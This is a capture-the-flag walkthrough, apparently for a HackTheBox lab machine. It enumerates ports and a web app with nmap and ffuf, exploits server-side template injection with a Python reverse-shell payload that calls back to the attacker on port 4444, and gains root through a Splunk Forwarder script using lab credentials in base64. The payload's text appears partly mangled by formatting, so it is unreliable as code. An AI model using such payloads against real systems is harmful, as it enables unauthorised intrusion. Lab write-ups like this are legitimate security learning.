1 minute read


Port Scanning and general enumeration (Nmap, FFuF)


Interesting. 8089 port for Splunkd. Doing some reasearch I found out that this port is for the Splunk Universal Forwarder. Let’s keep this in mind for later.

Standard enumeration of the site on port 80 doesn’t reveal anything great, but there is an interesting thing to note


doctors.htb.. let’s update our /etc/hosts file and point to doctors.htb


New things to play with! Let’s toss ffuf at this while we poke around

ffuf -u doctors.htb/FUZZ -w /path/to/wordlist -c


Let’s create an account and see what this app is all about.


Testing different payloads for different exploits gave us nothing in return at first glance. But if we go back and check the archive endpoint and check the source we see something interesting..


Ah! Vulnerable to SSTI!

Access (SSTI, reverse shell)

I actually covered this in a writeup for a CTF Challenge from Hacktivitycon2020 called Template Shack. This time, though, instead of using slicing to find where subprocess.Popen is, we’ll use this handy payload I found on PayloadAllTheThings


After editing it a bit so that it makes a call back to our machine:

.builtins'import'.popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh", "-i"]);'").read()

We can use that as our title, whatever you want for the body and make the post.

Fire up a listener on your box and reload the archive tab.

Privesc (linPEAS, Spelunker)

So now we have a shell on the box. Let’s see what linPEAS says.

Interesting log file entry


Doesn’t look like an email. Maybe the shaun user’s password? Turns out that it is. Strange.


Let’s take a look at port 8089 again. As I mentioned earlier, it’s for the Splunk Universal Forwarder. There’s some exploits floating around for it, including a local privilege escalation that we’re going to use.

First, we need to update the Spelunker script, because the script assumes that the creds are admin:changeme.

This is what we need to change:

Authorization: Basic YWRtaW46Y2hhbmdlbWU=


Authorization: Basic c2hhdW46R3VpdGFyMTIz

Get the script on to the box, give it the x flag and run it.

Follow the instructions to root!